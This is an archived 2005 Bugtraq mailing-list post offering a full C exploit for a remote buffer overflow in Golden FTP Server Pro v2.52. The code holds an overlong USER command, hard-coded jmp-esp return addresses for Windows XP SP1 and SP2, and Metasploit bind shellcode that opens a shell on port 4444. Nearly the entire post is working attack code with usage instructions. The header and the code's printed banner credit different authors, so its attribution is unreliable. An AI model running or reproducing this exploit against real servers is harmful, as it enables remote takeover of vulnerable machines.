lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 30 Apr 2005 15:03:17 +0000
From: "mohamed amhemed" <rodhedor@...mail.com>
To: bugtraq@...urityfocus.com
Subject: Golden FTP Server Pro Remote Buffer Overflow Exploit


Golden FTP Server Pro Remote Buffer Overflow Exploit
Bug Discovered by rod hedor (http://lezr.com)
Exploit coded By lezr hack
Web: lezr.com
E-Mail: rodhedor@...mail.com
Usage:exploit <targetOs> <targetIp>

/

/

Vulnerable Versions:
Golden FTP Server Pro v2.52

Exploit:
Run the exploit against the server. Afterward, right
click on the Golden FTP Server Pro icon in the Windows tray and click
Statistic.
It will open bind shell on port 4444

/

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char userreq[] =
"USER "
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

char *target[]=  //return addr
{
       "\xFC\x18\xD7\x77",   //WinXp Sp1 Eng - jmp esp addr
       "\xBF\xAC\xDA\x77"    //WinXp Sp2 Eng - jmp esp addr
};

char shellcode[] =
/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=348 Encoder=PexFnstenvSub 
http://metasploit.com */
"\x31\xc9\x83\xe9\xaf\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x82"
"\x2a\x64\x94\x83\xeb\xfc\xe2\xf4\x7e\x40\x8f\xdb\x6a\xd3\x9b\x6b"
"\x7d\x4a\xef\xf8\xa6\x0e\xef\xd1\xbe\xa1\x18\x91\xfa\x2b\x8b\x1f"
"\xcd\x32\xef\xcb\xa2\x2b\x8f\x77\xb2\x63\xef\xa0\x09\x2b\x8a\xa5"
"\x42\xb3\xc8\x10\x42\x5e\x63\x55\x48\x27\x65\x56\x69\xde\x5f\xc0"
"\xa6\x02\x11\x77\x09\x75\x40\x95\x69\x4c\xef\x98\xc9\xa1\x3b\x88"
"\x83\xc1\x67\xb8\x09\xa3\x08\xb0\x9e\x4b\xa7\xa5\x42\x4e\xef\xd4"
"\xb2\xa1\x24\x98\x09\x5a\x78\x39\x09\x6a\x6c\xca\xea\xa4\x2a\x9a"
"\x6e\x7a\x9b\x42\xb3\xf1\x02\xc7\xe4\x42\x57\xa6\xea\x5d\x17\xa6"
"\xdd\x7e\x9b\x44\xea\xe1\x89\x68\xb9\x7a\x9b\x42\xdd\xa3\x81\xf2"
"\x03\xc7\x6c\x96\xd7\x40\x66\x6b\x52\x42\xbd\x9d\x77\x87\x33\x6b"
"\x54\x79\x37\xc7\xd1\x79\x27\xc7\xc1\x79\x9b\x44\xe4\x42\x75\xc8"
"\xe4\x79\xed\x75\x17\x42\xc0\x8e\xf2\xed\x33\x6b\x54\x40\x74\xc5"
"\xd7\xd5\xb4\xfc\x26\x87\x4a\x7d\xd5\xd5\xb2\xc7\xd7\xd5\xb4\xfc"
"\x67\x63\xe2\xdd\xd5\xd5\xb2\xc4\xd6\x7e\x31\x6b\x52\xb9\x0c\x73"
"\xfb\xec\x1d\xc3\x7d\xfc\x31\x6b\x52\x4c\x0e\xf0\xe4\x42\x07\xf9"
"\x0b\xcf\x0e\xc4\xdb\x03\xa8\x1d\x65\x40\x20\x1d\x60\x1b\xa4\x67"
"\x28\xd4\x26\xb9\x7c\x68\x48\x07\x0f\x50\x5c\x3f\x29\x81\x0c\xe6"
"\x7c\x99\x72\x6b\xf7\x6e\x9b\x42\xd9\x7d\x36\xc5\xd3\x7b\x0e\x95"
"\xd3\x7b\x31\xc5\x7d\xfa\x0c\x39\x5b\x2f\xaa\xc7\x7d\xfc\x0e\x6b"
"\x7d\x1d\x9b\x44\x09\x7d\x98\x17\x46\x4e\x9b\x42\xd0\xd5\xb4\xfc"
"\x72\xa0\x60\xcb\xd1\xd5\xb2\x6b\x52\x2a\x64\x94";

char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90";

char passreq[] =
"PASS \r\n";

void main(int argc, char *argv[])
{
        WSADATA wsaData;
        WORD wVersionRequested;
        struct hostent  *pTarget;
        struct sockaddr_in 	sock;
        SOCKET mysocket;
        char rec[1024];

        if (argc < 3)
        {
                printf("\r\nGolden FTP Server Pro Remote Buffer Overflow 
Exploit\r\n",argv[0]);
                printf("Bug Discovered by Reed Arvin 
(http://reedarvin.thearvins.com)\r\n");
                printf("Exploit coded By ATmaCA\r\n");
                printf("Web: atmacasoft.com && spyinstructors.com\r\n");
                printf("Credit to kozan and metasploit\r\n");
                printf("Usage:\r\nexploit <targetOs> 
<targetIp>\r\n\r\n",argv[0]);
                printf("Targets:\n");
                printf("1 - WinXP SP1 english\n");
                printf("2 - WinXP SP2 english\n");
                printf("Example:exploit 2 127.0.0.1\n");

                return;
       }
       int targetnum = atoi(argv[1]) - 1;

       char *evilbuf = 
(char*)malloc(sizeof(userreq)+sizeof(shellcode)+sizeof(nops)
                                +sizeof(passreq)+7);
       strcpy(evilbuf,userreq);
       strcat(evilbuf,target[targetnum]);
       strcat(evilbuf,nops);
       strcat(evilbuf,shellcode);
       strcat(evilbuf,"\r\n");
       strcat(evilbuf,passreq);
       //printf("%s",evilbuf);

       wVersionRequested = MAKEWORD(1, 1);
       if (WSAStartup(wVersionRequested, &wsaData) < 0) return;



       mysocket = socket(AF_INET, SOCK_STREAM, 0);
       if(mysocket==INVALID_SOCKET){
                  printf("Socket error!\r\n");
                  exit(1);
       }

       printf("Resolving Hostnames...\n");
       if ((pTarget = gethostbyname(argv[2])) == NULL){
                  printf("Resolve of %s failed\n", argv[1]);
                  exit(1);
       }

       memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
       sock.sin_family = AF_INET;
       sock.sin_port = htons(21);

       printf("Connecting...\n");
       if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){
                  printf("Couldn't connect to host.\n");
                  exit(1);
       }

       printf("Connected!...\n");
       printf("Waiting for welcome message...\n");
       Sleep(10);
       recv(mysocket,rec,1024,0);

       printf("Sending evil request...\n");
       if (send(mysocket,evilbuf, strlen(evilbuf)+1, 0) == -1){
                  printf("Error Sending evil request.\r\n");
                  closesocket(mysocket);
                  exit(1);
       }

       Sleep(10);
       printf("Success.\n");
       closesocket(mysocket);
       WSACleanup();
}
// راندفو  انت  ح ث ا؛؛؛ ل ة

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/



Powered by blists - more mailing lists